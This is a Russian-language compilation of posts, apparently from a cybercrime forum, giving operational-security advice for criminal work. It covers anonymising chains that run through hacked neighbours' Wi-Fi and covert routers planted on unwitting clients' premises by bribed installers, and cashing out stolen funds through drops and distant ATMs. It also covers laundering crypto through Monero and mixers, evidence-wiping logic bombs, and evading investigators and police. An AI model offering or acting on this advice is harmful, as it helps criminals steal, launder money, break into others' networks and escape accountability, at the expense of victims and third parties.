А как же, бл#ть, в сеть то выходить, спросите вы? Вариантов два.

1. Для выездов в город — ALFA AWUS1900 + KALI в виртуалке. Базовый сценарий использования: находимся в кафе, обязательно проверяем наличие камер (их не должно быть). Отламываем при этом вайфай не самого кафе, ибо туда могут прийти и о вас вспомнят — не спрашивайте почему, это всегда так работает, по закону подлости, — а соседский. Находить и/или создавать такие точки выхода — ваше проклятие и ваша основная работа. Чем больше их будет — тем меньше вероятность, что вас кто-то где то узнает.

2. Для работы из дома — любой роутер с поддержкой LTE/5G (я рекомендую GL- XE300 либо его аналоги). Подключение с рабочей машины к роутеру — ТОЛЬКО при помощи эзернет (помним про вафлю, которая вас палит). Симка левая. Комплект симка + роутер служит месяц, потом симка выкидывается, а роутер продается на авито/ибей с ЛЕВОГО аккаунта! Если денег на смену роутеров нет, ищите роутер/модем/роутер-с-модемом с возможностью смены IMEI, но я советую железо менять. Сто баксов в месяц копейки, а безопасность вашей жопы бесценна.

Шо, и все? Нет, не все.

== РАБОТА В СЕТИ.

Следующим слоем защиты лично у меня идет отдельный класс роутеров на базе OpenWRT с измененной прошивкой (выкинуто все лишнее), добавлен Yggdrasil + WireGuard. Этих роутеров бывает два вида, либо упомянутый выше GL-XE300 (если нужна сим карта), либо более простая версия GL-MT300N-V2 (если достаточно только эзернета). У меня также есть дропы-установщики из числа монтажников сетей. Они, как правило, предельно голодные и готовы за скромную плату воткнуть этот роутер очень технично куда надо, да так, что клиент его никогда не найдет (таких клиентов они сами подбирают). В большинстве случаев, эти роутеры втыкаются туда где никто не лазит и комплектуются камерой. Это последний бастион защиты, до сценария "приход домой" я не довожу.

Далее, возвращаемся на рабочую тачку и рисуем схему маршрутизации трафика:

тачка (TunSafe, in) — роутер с левой симкой дома (YGG, in) — левый роутер с камерой хз где (YGG out, TOR in) — TOR (out) — VPS (TunSafe, out)

Сценарии маршрутизации, технологии и протоколы на самом деле разные, я с ними частенько экспериментирую, постоянно пытаюсь найти некий идеал (которого, вероятно, нет). Скорость при этом стабильно 1-3Мбит/с, для целей работы этого вполне достаточно. Иногда все это работает криво, иногда падает, в общем я все еще в поисках. Но, в целом работает. Да, если надо, я продаю эти прошивки/роутеры, да, если надо, я настраиваю сети таким образом. ДОРОГО.

В сравнении с вашими всякими дабл-трипл-залупипл VPN, вопрос не в количестве хопов; вопрос в расположении и подконтрольности этих хопов. Разумеется, НЕЛЬЗЯ юзать коммерческие и бесплатные ВПНы, которые вы НЕ СДЕЛАЛИ сами — они все ХРАНЯТ ЛОГИ, как бы им не хотелось убедить вас в обратном. Да, я знаю про тайминги соединений и про зеркалирование портов при необходимости на уровне аплинка, не надо мне про это рассказывать. Это для них точка входа (погонно- плечевых), а дальше пусть распутывают. Пока никто не распутал, потому что таких маршрутов в комплекте с роутером дома я построил овердохера. И каждый день юзаются разные. Да, я параноик в мыслях, а не в ощущениях. Сплю крепко)

Разумеется, все сервера и прочее — все на левые данные, в разных странах.

Вариантов тут тьма, готов обсуждать, помогать, итд. Не утверждаю, что мой вариант самый крутой.

ЧАСТЬ ПЯТАЯ: ШИФРОВАНИЕ

Ну вот мы и добрались до рабочей тачки и контента на ней. Жуть, ужас берет. Я говорил и повторю еще раз — я продолжаю считать, что если вас пришли и взяли за жопу — то на вас УЖЕ есть доказательная база (школьников с версиями в духе "ну мало ли, а вдруг у тебя роутер похакали") отправляем учить уроки. Я прекрасно помню свой опыт встречи с оперативной группой и как они пытались те самые улики с моего компа достать (спойлер: не достали). Но тогда было давно, опера ничего толком не умели (как не умели и фейсы), а что у них там сейчас — я проверять не хочу. Поэтому...

У меня сделано все предельно просто и я тут нифига не заморачивался. Рабочая машина на базе убунты (почему нельзя юзать Tails, Whonix, Qubes и прочее говно — ищите по форуму, я уже писал), системный SSD EXT4 + LUKS, пароль ебейшей длины на Yubikey + логин в систему, sudo и tty — тоже аппартный ключ, кроме пароля. Далее, внутри отключено кэширование рабочих файлов. Рабочие файлы находятся на двух SSD винтах (пока что FIPS 140-2, с аппаратным шифрованием) + внутри также EXT4 + LUKS. Пробовал внутрь совать контейнер VeraCrypt, не взлетело, намекнув что и так хватит. Один винт основной, второй бэкап.

===

ДОПОЛНЕНИЯ:

1. ПО СЕНЬКЕ ШАПКА.

Этот мир устроен так, что все в нем пытается стремиться к балансу. Если вы лезете к государству и играете в цифрового террориста, то на вашу поимку будут пущены если не все, то как минимум весьма значительные ресурсы. В то же время, если вы занимаетесь какой-то мелкой ерундой на десятку другую килобаксов в месяц — то вы, скорее всего, Неуловимый Джо, которого (как известно) никто не ловит, потому что он нахрен никому не нужен. Мораль тут такова, что нужно отдавать себе отчет в том, какое влияние на мир оказывают ваши действия и четко понимать, кто вами будет заниматься — от этого будут зависеть абсолютно ВСЕ ваши стратегии и тактики. Ведь играть в кошки-мышки с МВД/ФСБ совсем не то же самое, что играть в ту же игру с ФБР/АНБ.

2. ШИЗОФАЗИЯ ПАРАНОИДАЛЬНОГО ТИПА.

Я не уверен насчет того, что это и правда шизофазия — я не врач. Но звучит прикольно, хотя на деле ничего прикольного нет. Рано или поздно, параноя накрывает всех. Если вас еще не накрыла, то либо слишком рано, либо вы беспечный долбоеб. Каждому нормальному человеку отличным помощником является страх. А страх умноженный на интеллект вообще гремучая смесь — ведь это единственное, что поможет вам все просчитать и не допустить ошибку. Ваша единственная задача — сделать так, чтобы страх не накрывал вас с головой и не парализовал способность думать. В остальном, как я и сказал ранее, он отличный помощник.

===

Скорее всего, я что-то где-то проебал в описании, статья писалась за один заход и заканчиваю я ее в 3 утра.

На этом пока остановимся.

Всем успехов!

Анонимность для черной работы

ID: 676533bbb4103b69df371cf0
Thread ID: 33455
Created: 2019-11-25T21:47:06+0000
Last Post: 2020-04-13T12:31:49+0000
Author: AnonX0x0
Replies: 51 Views: 18K

Cписок, который нужно соблюдать, чтобы быть в безопасности.

1. Всегда используйте VPN/Double VPN (желательно).

2. Никогда не работайте напрямую с VPN, используйте socks5/proxy.

3. Никогда не работайте по стране проживания (не сри там, где живешь)

4. Используйте TrueCrypt + отдельную систему на флешке для работы.

5. Исключите любую мобильную связь с партнерами. Если надо принять СМС или звонок — воспользуйтесь сервисами.

6. Для общения используйте Jabber + PGP, если надо что-то передать через ICQ — используйте privnote.com, либо аналоги.

7. Используйте только bitcoin , и никакие другие платежные системы, даже PerfectMoney (эти выдают инфу о пользователях, информация проверенная).

8. Не рассказывай никому о своей работе, не используй дропов которые знают тебя, и даже дроповодов, которые знают тебя.

9. Тщательно выбирай партнеров — из-за неправильного выбора партнера, все 8 пунктов, что выше — могут пойти по пи..е.

10. Выводи деньги с помощью АТМ заказанных у проверенного сервиса, и снимай наличные минимум в 50 км. от своего места проживания. ——————————————————————————————————————————————————

Теперь давайте разберем все пункты более подробно. Пункт номер 1 (Всегда используйте VPN/Double VPN (желательно).)

Пункт думаю понятный всем. Для чего это нужно? Чтобы провайдер не видел, какие вы сайты посещаете, но еще и для «анонимности», иногда говорят помогает. У всех более менее крупных провайдеров, есть список форумов по нашей тематике, которые, когда вы посещаете со своего IP, мониторятся. То есть если абонент посещает такие сайты, то за ним стоит приглянуть. Так что не нужно давать повод приглядывать за собой различным структурам, а то они могут.

2. Никогда не работайте напрямую с VPN, используйте socks5/proxy.

Ну тут более менее думаю понятно, не нужно добавлять хлопот вашему впн провайдеру, и подставлять других пользователей, а то приедет полиция, извлекет сервер, будет логи смотреть. Нехорошо получится. Кстати, миф о том, что впн сервисы не ведут логов — полная хуета, ведут, и еще как ведут. И в 70+% случаях сливают куда надо, поэтому лучше использовать свой впн, так спокойней.

3. Никогда не работайте по стране проживания (не сри там, где живешь)

Тут переходим к работе по ру и снг. Объясняется все это далеко не патриотизмом, а тем, что на вас проще выйти. Вас возьмут — вы сдадите партнеров, и все будет нарастать как снежный ком. Почему же вас поймают, спросите вы? Сейчас такое время, когда силовые структуры подчиняются тем, у кого есть деньги. Так как вы грабите российские банки, то банкиры — ебут управление к и фсб, заставляя их работать в этом направление. А так как тем совсем не нравится получать каждый раз в шею из-за того, что какой-то вася пупкин слил деньги у клиентов банка, и имидж банка из-за этого страдает, то они приложат все усилия, чтобы вас поймать. Но как это будет сделано? Очень просто, за любым преступлением — стоит вывод денег в нал. И вот именно на этой схеме вы и спалитесь. Даже если атм будет на дропа, то установить то место, где снимались деньги нет никаких проблем. Дальше — больше, место известно, значит радиус проживания мошенника тоже известен. Дальше фоторобот с банкомата, опрос свидетелей, и вуаля, вас практически нашли. Вы заказывали карту через интернет и ее получал ваш дроп? Это еще хуже, едут к дропу на кого оформлена карта, дроп сдает дроповода, дроповод сдает адрес вашего дропа, дроп сдает вас. Все, вы в ловушке. Так же вас могут слить партнеры, которые оказались менее защищены, и были пойманы. Ведь наверняка вы с партнером трепались не только о работе, но и о жизни, давали партнеру свой номер, пусть он и оформлен не на вас, по нужным исходящим вызовам легко определить настоящего хозяина телефона. Например вы поговорили с партнером, а потом маме позвонили, сказать, что у вас все хорошо. Считайте, что вы уже пойманы. В случае же если вы работаете по США, то нашим ментам в принципе похуй на запросы тамошних властей, так как отношения между США и Россией очень плохие, то вам вряд-ли что-то будет, но меры предосторожности все же стоит соблюдать, так как особо наглые получат по шее, так как наглость никто не любит

4. Используйте TrueCrypt + отдельную систему на флешке для работы.

Если вас все же поймали, то неплохо будет, если у вас стоит true crypt или другие системы шифрования. Так как на вас выйдут скорее всего за 1-2 эпизода, а найдут на компе еще много других эпизодов. Кто пишет про крипторектальный метод расшифровки — сильно заблуждаются. Бить вас не будут. Это немного другая сфера, в отличие от уголовников — вы обычный мошенник, и никто вас бить не будет. Пытать? Да, возможно, немного попугают, может уронят разок в коридоре головой об кафель. Больно, но не смертельно. Тем более, что это разовые акции устрашения. Как просиходит? Вас допрашивают в кабинете, заходит еще один опер, и говорит, что ему надо с вами поговорить у себя в кабинете. Перед этим развязывает тебе шнурки. Затем, когда вы идете по коридору, он наступает на шнурок, и толкает вас легонько в спину. Вы падаете, вам больно — но он не виноват, вы запутались в шнурках. Конкретно так, чтобы вам одевали пакет на голову и избивали вас — такого не будет, у них и без этого забот хватает. Так что шифрование вам поможет. По-поводу того, что это легко расшифровывается — вранье. Нет у них таких специалистов. Все показания делаются вами, и только вы себя садите. Уровень технического развития оперативников довольно низкий, поэтому никто ничего там не расшифрует, но еще лучше, если они просто этого не найдут , флешка допустим смоется в унитаз, и все.

5. Исключите любую мобильную связь с партнерами. Если надо принять СМС или звонок — воспользуйтесь сервисами.

Про мобильники я писал немного выше. Ни для кого не секрет, что запилинговать местоположение не такая большая сложность, и техническая возможность есть даже у оперативников в каком-нибудь Мухосранске. Тем более, если примут вашего партнера — то вы об этом вряд-ли узнаете, он будет с вами так же общаться, и после короткого разговора с ним по телефону — вас вычислят. Поэтому если партнер предлагает вам обсудить что-то по телефону, то задумайтесь, для чего это нужно? Все ведь можно описать в jabber’e, или на край — поговорить по скайпу. Поэтому будьте всегда бдительны, даже если вы с ним знакомы ни один год. Даже если его не приняли, его могут прослушивать, и вычислять все входящие/исходящие звонки, что опять таки выведет на вас.

6. Для общения используйте Jabber + PGP, если надо что-то передать через ICQ — используйте privnote.com, либо аналоги.

У мусоров вне штатно есть свои хакеры, которые имеют доступы к большинству jabber серверов. Откуда у них хакеры? Большинство хакеров начинали свой пусть со взлома соседского интернета, и после этого они в поле зрения красных, а те не гнушаются обратиться за услугой к знающему человеку. Поэтому переписка в открытом виде — это бред. PGP же не позволит читать любопытным красноперкам ваши движения. И еще — старайтесь как можно чаще менять контакты, так же как и VPN. Усложняйте работу им — и будете в безопасности.

Как я уже писал выше, что вас отслеживают далеко не по IP, а по средствам, которые вы получаете. Есть конечно и биткоины, но с их нестабильным курсом пользоваться ими нецелесообразно. Тот же PerfectMoney — выдает информацию о своих пользователях, и о том, куда уходят эти деньги. Пруфы не буду приводить ради своей безопасности, но я думаю, если голова у вас работает, то вы не будете юзать данную платежку. Про WM я вообще молчу, у них вообще офис в Москве, так что думайте.

Анонимность, безопасность Telegram

ID: 676533bbb4103b69df37191d
Thread ID: 73903
Created: 2022-10-03T17:25:02+0000
Last Post: 2024-10-10T21:59:19+0000
Author: Rogue0M
Replies: 153 Views: 17K

Вся суть деятельности происходит в ТГ, как лучше всего заходить в него? Какую лучше сделать связку? На данный момент vpn -> dedik -> antik (proxy) -> TG(browser). Не кидайте камнями, выслушаю годные советы!

Анонимность в сети интернет

ID: 676533bbb4103b69df37195f
Thread ID: 4319
Created: 2005-07-21T13:23:56+0000
Last Post: 2024-06-01T12:00:07+0000
Author: Змий
Replies: 38 Views: 16K

Господа, у меня к вам вопрос: есть ли способы анонимного входа в интернет? И если можно, напишите здесь способы изменения реальных ip адресов на вымышленные.

VPN

ID: 676533bbb4103b69df371cda
Thread ID: 32623
Created: 2019-10-21T15:00:06+0000
Last Post: 2020-05-11T11:10:42+0000
Author: BlokkEntweiher
Replies: 52 Views: 14K

Приветствую. Посоветуйте хороший VPN для линукс, без логов.
Спасибо

Programs, scripts

ID: 676533bbb4103b69df371dbd
Thread ID: 7315
Created: 2006-03-07T23:35:28+0000
Last Post: 2011-01-07T15:55:48+0000
Author: Unlimited
Replies: 26 Views: 14K

Здесь будут выкладываться программы и скрипты для работы с прокси серверами

Мой опыт в киберполиции. Как ловят хакеров?

ID: 676533bbb4103b69df371981
Thread ID: 109960
Created: 2024-03-08T10:34:38+0000
Last Post: 2024-04-06T18:25:35+0000
Author: ThorZirael
Prefix: Видео
Replies: 125 Views: 13K

Для любителей текста :

P.S. уже не работаю, ушел потому что мало платили, на тот момент это было +-500$ в мес, местами больше, местами меньше.

99\100 преступлений раскрывается по методике от преступника к преступлению, а не наоборот как в случае с кражами, убийствами, грабежами и разбоями, - из-за неэффективности раскрытия киберпреступлений по методики от преступления к преступники. Это на мое личное мнение, реальной статистикой я не обладаю.

Отработка дампов форум
1.1 Масс деан с дампов форумов. Т.е. берем дампы хак форумов, первое сравнение БД хак форумов (почт) и БД Vk.com, ASK, спрашивай, мамба, ловелпланет, а также банковских БД с почтами, на выходе масс деанон.
1.2 Отработка ip логов форума;
1.3 Отработка ЛС/ПМ форумов;
NetFlow у провайдеров по ip форумов; Тут думаю всем все понятно, даем провайдеру ip форумов и узнаем кто, когда и как часто посещает ресурс (Vpn тут спасает)
Отработка просто поиском по форуму по ключевым типо vk.com.
Отработка групп vk таких как lolz guru, зеленка и тд, т.е. отработка участников сообщества.
AbuseDB ip, смотрим диапазоны города и просматриваем жалобы и отрабатываем их.
Shodan по портам ратников, панелей, ботнетов и тд.
Иногда раз в 1000-чу лет попадается материалы от ФБР, но на моей лично практике такого не было.
Отработка сервисов, таких как сервисы отрисовки, миксеры, гаранты и тд. Отработка всех кто пользуется.

Тезисно еще:
- старые дампы интереснее и ценнее новых.
- даже хаЦкеры интересны, ищут и документируют всех.
- приоритет деанона - админы, модеры

В видео конечно же больше всего на эту тему, текстом только тезисно.

00:00 Вступление
00:27 Моя линия работы. О моем опыте
00:43 Разница раскрытия обычных преступлений от киберпреступлений
03:41 Самый эффективный способ раскрытия киберпреступлений
09:22 Материалы ФБР
09:42 Отработка сервисов, которыми пользуются хакеры11:52 Shodan, открытые порты вредоносных программ
13:32 Кейс по взломанному WiFi
14:29 Очевидные способы поиска киберпреступников
15:35 Поиск киберпреступников в vk.com
16:24 AbuseIPDP. Отработка жалоб на ip адреса
17:57 Интересны все, и хакеры и хаЦкеры
19:05 Неочевидная ценность старый дампов хак-форумов
20:36 За кем идет приоритетная охота?
21:48 Какие киберпреступления документировались кроме хакеров?

Что делать и как вести себя при задержании

ID: 676533bbb4103b69df371a19
Thread ID: 34857
Created: 2020-02-08T23:04:59+0000
Last Post: 2023-08-30T10:04:11+0000
Author: kaspersky
Prefix: Статья
Replies: 106 Views: 13K

В книжном магазине без проблем можно найти и энциклопедию тюремной жизни, и словарь блатного жаргона со справочником воровских татух. Опять же, поскольку информации очень много, несведущему человеку трудно выделить главное, обратить внимание на действительно важные моменты. Постараюсь выделить в своем повествовании именно это.

1.СПЕЦОПЕРАЦИЯ. Если вы попали в поле зрения борцов с экстремизмом- кибертерроризмом-хакинизмом, и вам шьют дело, то узнаете об этом вы в самую последнюю очередь. Обычно это бывает так: в шесть утра вы просыпаетесь от настойчивых звонков в дверь, за которой находится возмущенный сосед снизу (с вероятностью в 99% никто понятия не имеет о жильцах на соседнем этаже), вопящий, что его заливают сверху. Вы бежите в ванную и видите, что никакого потопа нет, о чем ему и сообщаете, однако он голосит, что с потолка льется рекой и предлагает лично убедиться в этом. Вы, будучи уверенным, что обвинение напрасное, смело открываете дверь, и через секунду оказываетесь на полу с заломленными руками, а в квартиру вламывается десяток мусоров – следаки, опера,аверы и несколько автоматчиков в масках и бронежилетах. Ощущение нереальности происходящего еще долго не покинет вас. Далее обыск, изъятие всей компьютерно-телефонной техники, подброс детонатора или пары патронов (по необходимости), и вы покидаете родной дом в наручниках на энное количество лет.

Второй вариант: вас ждут у подъезда двое крепких молодцев в штатском. Из дому- то все выходят – в магазин, на работу, с ребенком погулять и т.д. Вас хватают и везут в отдел. Или хватают, вынимают из кармана ключи от дома и далее по описанной выше схеме. В протоколе зафиксируют, что вы добровольно впустили следственно-оперативную группу и согласились приехать в мусарню, получив от сотрудников повестку с приглашением «на беседу». Понятно, что никто мнение «клиента» при этом не спрашивает.

Как ни готовься мысленно к такому повороту судьбы, он все равно случается неожиданно. Вполне естественно, что вы находитесь в состоянии шока и слабо отражаете смысл происходящего. Собственно, цель мусоров и заключается в том, чтобы ввергнуть вас в это состояние и быстро «отработать», пока клиент не пришел в себя. Совет могу дать только один: не давать никаких показаний и вообще, желательно, не открывать рта. Дело в том, что часто в таких случаях ведется оперативная видеосъемка и сказанная в сердцах фраза «чтоб вы сдохли, гестаповцы е..ные!» потянет еще на пару статей УК – тут и оскорбление должностных лиц при исполнении, и угроза убийством. Единственное, что следует отвечать на любой вопрос: «Требую мое авокадо!»

Кстати, об этом волшебном фрукте. Вряд ли вы настолько состоятельный гражданин, что имеете семейного адвоката или пользуетесь в повседневной жизни услугами юридической фирмы. Соответственно, защитника у вас нет. Следователь, мило улыбаясь, скажет, что это не проблема, адвоката по назначению для следственных действий он предоставит совершенно бесплатно. Следует решительно отказаться! Дело в том, что навязать защитника вам не могут, а любые показания, данные без адвоката, если в дальнейшем обвиняемый от них отказывается, не могут быть использованы в качестве доказательства его вины.

«Подментованный» адвокат скорее всего станет помогать операм вас колоть. Шепнет, что договорился со следователем: признаешь вину – идешь на подписку о невыезде. Уйдешь в отрицалово – поедешь в СИЗО. Поэтому никаких дел с адвокатами по назначению иметь нельзя. Это железное правило. Следователь будет давить: мол, или бери адвоката, какого дают, либо отказывайся от защитника вообще. Ни в коем случае не ведитесь! Ссылайтесь на Конституцию, согласно которой каждый имеет право на защитника. Но при этом защитник не может быть навязан. Мол, этого Васю я первый раз в жизни вижу, я ему не доверяю. Требую предоставить мне возможность выйти на связь со своим адвокатом, фамилию не помню, зовут Иван Иванович, это дядя жены (сосед мамы, друг детства папы). Требую предоставить мне право позвонить (жене, маме, папе) – они напомнят телефон защитника.

Мусора будут говорить, что, дескать, сами позвонят, скажи, какой номер набрать. Не ведитесь ни в коем случае, требуйте телефонную трубку в руку. Далее звоните родственникам, объясняете положуху и просите найти адвоката по соглашению. Пока он не прибудет, от участия в любых следственных действиях воздерживайтесь. Конечно, менты категорически станут отказываться давать вам позвонить. Это незаконно, но они знают: золотое время для «отработки» клиента – первые два часа после задержания. 90% признательных показаний даются в этот период, пока задержанный один, раздавлен и запуган.

Что делать в этом случае случае: просите остаться наедине с адвокатом по назначению, дабы обсудить детали ваших с ним отношений, прежде чем поставите подпись под согласием об участии защитника в деле. Отказать не имеют права. У ментовского адвоката просите телефон и звоните, куда надо. После этого заявите следователю, что от услуг предоставленного защитника отказываетесь. Если адвокат начинает блеять, что телефона нет, сдал на вахте и т.д. – значит это фуфло. Требуйте, чтоб он добился реализации вашего права на телефонный звонок ДО НАЧАЛА следственных действий, иначе никаких отношений с ним у вас не будет. Если он этого не сделает, с ним все окончательно ясно. Отказывайтесь от его услуг и добивайтесь права на звонок. Мены вынуждены будут согласиться.

2. ПОХИЩЕНИЕ, ПЫТКИ. Выше описана ситуация, в которую вы попадете, если с вас будут прессовать более-менее в рамках Уголовно-процессуального кодекса. Но это происходит далеко не всегда, особенно если дело инициировано ФСБ/СБУ. Высока вероятность похищения и пыток. Вообще, похищение от задержания поначалу совершенно ничем не отличается. В обоих случаях вы оказываетесь один на один с отморозками в масках, которые будут вас поддавливать физически и прессовать психологически (тут уже по полной программе). Далее возможны варианты. Если вас привезли для допроса – смотри алгоритм действий, описанный выше. А если для неформальной «беседы» в неизвестном месте – все гораздо хуже. Плохой знак, если из машины вас выводят, загнув буквой «зю» и натянув куртку на лицо. Значит, не хотят факт задержания был зафиксирован камерами, которыми оборудованы почти все мусарни.

Цель «беседы» – сломить морально, подавить волю к сопротивлению. Опера будут красочно описывать все ужасы орально-анальных проникновений, которым вас подвергнут в бане страшные урки-пересидки. Но если будете сотрудничать со следствием – уже вечером окажетесь дома под подпиской. Стряхивайте с ушей. В тюрьме у вас практически не будет шанса пересечься с рецидивистами, они содержатся отдельно от «первоходов». Могут помахать перед носом пакетиком с белым порошком и сказать: мол, это мы у тебя в куртке нашли, если экспертиза покажет, что наркота – уедешь в тундру лет на 10. Лучше давай, братан, сознавайся, что в экстремистской организации состоял – отделаешься трехой. Насколько серьезны такие угрозы? Вот тут уже все очень даже может быть. Но идти в сознанку не спешите. Изображайте сдержанное желание пойти на компромисс в части признания вины, но твердо стойте на том, что любые показания готовы давать только в ходе допроса, ибо «доверительная беседа» как это мероприятие называется в ментовских рапортах, процессуального статуса не имеет. Ну, а допрос, как известно, не может состояться без защитника, которому вы доверите право представлять ваши интересы.

Возможно, будут шантажировать. Скажут, что нашли наркоту у вас дома при обыске. Не ваше? Ну, значит, это сын банчит дурью. Ему уже есть 16? О, все очень плохо! Поедет на малолетку, а это – самое худшее, что есть в гулагах (с этим, кстати, не спорю). Но, если дашь признательные показания… Насколько мусора готовы воплотить свои угрозы в реальности? Если я скажу, вероятность ниже 1%, вряд ли вам станет легче. Там все воспринимается совсем иначе. Чувствуя свою полнейшую беспомощность, жертва охотно верит мусорским угрозам и ломается. Кто-то, думая, что он хитрый, соглашается на все, рассчитывая в дальнейшем отказаться от своих показаний. Этот номер точно не прокатит. Для россиянского суда первоначальные показания, если соблюдены все бюрократические процедуры при оформлении протокола, имеют гораздо большее значение, чем все иное вместе взятое.

Даже если у вас в дальнейшем обнаружится 100-процентное алиби на время совершения преступления, суд придет к выводу, что преступление совершено в другое время, но вы точно виновны. Был человек, который в ходе ночного допроса написал под диктовку мусоров показания о том, как многократно изнасиловал 13-летнюю девочку. Менты сами верили, что так оно и было (кляузу написала мать девочки, алкоголичка), поэтому в средствах воздействия себя ничем не сдерживали. Они сами удивились, когда получили данные экспертизы – потерпевшая девственно чиста, и не только на коже, но даже на одежде не имеет признаков эпителия (микроскопические кожные чешуйки) обвиняемого, что полностью исключает телесный контакт. Но если есть признание, то пареньку всего лишь «перебили статью» с изнасилования на «сексуальные действия иного характера». Суд пришел к выводу, что обвиняемый был неточен в своих собственноручных показаниях, где в красках описывал, в какие места и сколько раз пихал жертве свою елду. Но и то хорошо – благодаря экспертизе он получил не 15 лет, а только 8,5 лет строгого режима.

Напоминаю, что разницы между задержанием и похищением вначале нет никакой. Она появляется только в тот момент, когда вы подписываете первый протокол с датой и временем совершения процессуального действия (прокол обыска, задержания или ознакомления с постановлением о возбуждении уголовного дела). Часто задерживают без свидетелей, для всех вы просто вышли из дома и не вернулись. Если задерживают публично, тоже не беда. В деле обязательно будет бумажка, что вы были после допроса отпущены, а куда подевались – бог весть… Пытать вас могут долго – хоть три дня, хоть неделю. Добившись желаемого, просто оформят «явку с повинной». Поэтому, если все зашло настолько далеко – не стоит играть в героя, сознавайтесь во всем, не дожидаясь, пока вам выжгут спинной мозг электричеством (пытки током очень популярны потому, что не оставляют следов на теле).

Что делать, если будут требовать оговорить соучастников по «сообществу»? Возникает вопрос морального выбора и все такое прочее.Очевидно что Вам будут вешать лапшу на уши(или не лапшу),что против Вас сообщники уже дали показания и молчать нет смысла. Решайте сами.Сообщникам (реальным,или мнимым) ,будут говорить то же самое.Это называется самый обычный "понт" и прием стар как мир.Однако имейте ввиду следующее и давайте посмотрим правде в глаза: профессиональные палачи добиваются нужного результата в 9 случаях из 10. Они умывают руки только, если жертва молчит, но при том существует реальная угроза смерти пытаемого. Так что, если имеется группа лиц, и надо превратить ее в сообщество, то будут пытать всех, и кто-то все равно даст требуемые показания. Если вы немножко покорчитесь на дыбе и подпишете фантазии следака, то хотя бы ваших подельников, возможно, «крепить» не станут, заполучив нужную бумажку в дело. Каратели ведь работают не за идею, а за зарплату. Если необходимый минимум следственных действий реализован и требуемые бумаги подшиты – чего им напрягаться?

Впрочем, если дело на особом контроле у начальства, то ублюдки в погонах могут проявить и несвойственное для них служебное рвение, пропустив через пыточную всех фигурантов. В этом случае тем более нет смысла играть в молчанку. Но все же успокою. Пытки к тем, кто занимался обычным «кардингом/хакингом » не связанным с "системными замашками" вряд ли будут применять. Признательные показания в таком деле особой роли не играют. Тут ключевое значение имеет экспертиза. Напишет эксперт – пиши пропало.

3. СДЕЛКА С ДЬЯВОЛОМ. Иногда следователь предлагает договориться по- хорошему: явка с повинной в обмен на подписку о невыезеде вместо СИЗО. Если разговор серьезный, не спешите с ходу отказываться. Посоветуйтесь с адвокатом. Не уповайте на суд – мол там вы докажете свою невиновность. Суду насрать на вашу виновность/невиновность. Если дело будет сшито относительно грамотно – получите срок. Если доказательная база окажется слабой, суд вернет дело на доследование, и все равно впаяет срок. Но, если сделать так, чтобы суд не состоялся…

Не состоится он лишь в том случае, если вы сбежите из Ебанатория(СНГ). Понятно, что через аэропорт или вокзал даже пытаться не следует. Только ножками через щелястую границу с Эстонией или Финляндией. Где и как это лучше сделать, ищите инфу в Интернете. Однако бежать можно только, оставаясь на воле. Дело рискованное, но, если риск оправдан, почему бы и нет? Терять, кроме собственных цепей, вам все равно нечего. Признавайтесь во всем. Как вырветесь из гестапо – сразу «вставайте на лыжи». При всем при этом ошибочно считать,что не работая,скажем по СНГ,Вы не заинтересуете интерпол и спецслужбы РФ.Или у Вас будут какие-то привелелегии и вербовка в ряды гестапо?Ничего не будет.Будет срок и там и тут.Это мнимая изоляция-полная чушь.Cотрудничество по хакерской теме давно налажено и отработано на международном уровне.

20 практических советов по безопасности в Dark деятельности от Roxy

ID: 676533bbb4103b69df371b50
Thread ID: 61147
Created: 2022-01-10T16:20:59+0000
Last Post: 2022-01-27T18:31:51+0000
Author: Roxyhide
Prefix: Статья
Replies: 65 Views: 13K

"За безопасность надо платить, за ее отсутствие - расплачиваться" Уинстон Черчилль

Click to expand...

Авторская статья от @roxy_hide

**Всех приветствую, начнем пожалуй.

Язык наш главный враг!** – Никто не должен знать чем вы занимаетесь.
(Даже девушка, жена и тд. Вы расстанетесь/разведетесь начнется шантаж и прочее.)

2) Приобретите себе вторую машину для работы.
Коротко опишу. Один ПК должен быть для чернухи, второй для своей белой жизни. Не советую использовать 1 ПК, так как многие сидят в основном в соц. сетях и тд. Интернет все запоминает – все ваши отпечатки, историю входов с разных айпи

инфу о железе.

**3) Твой ПК не анонимен! **Во первых советую всем у себя отключить телеметрию под ноль. (Можете вписать в гугл – отключить телеметрию в виндовс…) Также советую поставить все настройки конфиденциальности под минимум. Также отключаем микрофон и камеру (заклеиваем, есть вообще ноуты без камеры к примеру Asus Strix линейка).

4) Не используй коммерческие впн.
Лучше поставить свой впн на Wireguard (статья как сделать) [https://unixhost.pro/clientarea/knowledgebase/63/ustanovka- wireguard.html](https://href.li/?https://unixhost.pro/clientarea/knowledgebase/63/ustanovka- wireguard.html). Дело в том что все впн – тот же норд, экспресс, ипваниш за которые платим могут вас сдать.

5) Вывод денег – не советую выводить сразу на карту, лучше используйте обменники – типо продать-купить. Отмыв денег по следующей схеме:
Бтс>Монеро>Бтс (на чистый адрес) смотрим курс тут (https://www.bestchange.com/). Или через миксеры Wassabi wallet, Blender.io

**6) Смотри что скачиваешь себе на комп. **Никогда не переходите по левым ссылкам, не качайте кряки программ. Даже в обычный пдф или ворд можно вшить малварь. Любой подозрительный софт запускайте на виртуальной машине.

7) Перепрошить роутер. Любой трафик можно перехватить, а тем самым вместе с ним ваши пароли и другую инфу.

8) Взламай вайфай соседа (смени мак адрес софтом(кликабельно) и заблокируй веб панель роутера соседа путем придумывания пароля ударом головой об клавиатуру изменяем забываем).

9) Зашифруй систему с помощью VeraCrypt (кликабельно).

10) Билд рансомвар (который сработает как логическая бомба при открытии определенных ресурсов на компе и определенных действиях уничтожит всю систему и компрометирующую инфу). Существуют билды, которые могут уничтожить ваш ноут на физическом уровне при выполнении нужных условий, например когда твой ноут забрали криминалисты и увозят от дома на радиус 100 метров.

**11) Помни 2 хороших удара по почкам открывают любые пароли.

На ПК создаешь виртуалку с помощью билда Vector V13 (кликабельно), в вирте подключаешься к дедику **(на выходе имеем 3 системы).

13) Замена данных, по типу имени ПК, ID процессора, MAC адреса... Софт STZBlaster. При первом запуске открывается окно со всеми стандартными настройками устройства. Для смены всех параметров необходимо нажать на "Randomize all values".

14) Заметаем следы: Если вдруг, вы при каких-то обстоятельствах, употребляли в диалогах VK такие слова, как: "вбив", "обнал", "кардинг" - удаляйте эти диалоги. Ваши соц.сети недолжны вызывать НИКАКИХ подозрений о том, чем вы занимаетесь! Знаю многие общаются в инсте.

15) Телеграм. Ставите пароль на ваш аккаунт и если к вам уже пришли, просто завершаете все сессии через телефон, выходите с аккаунта и удаляете мессенджер.

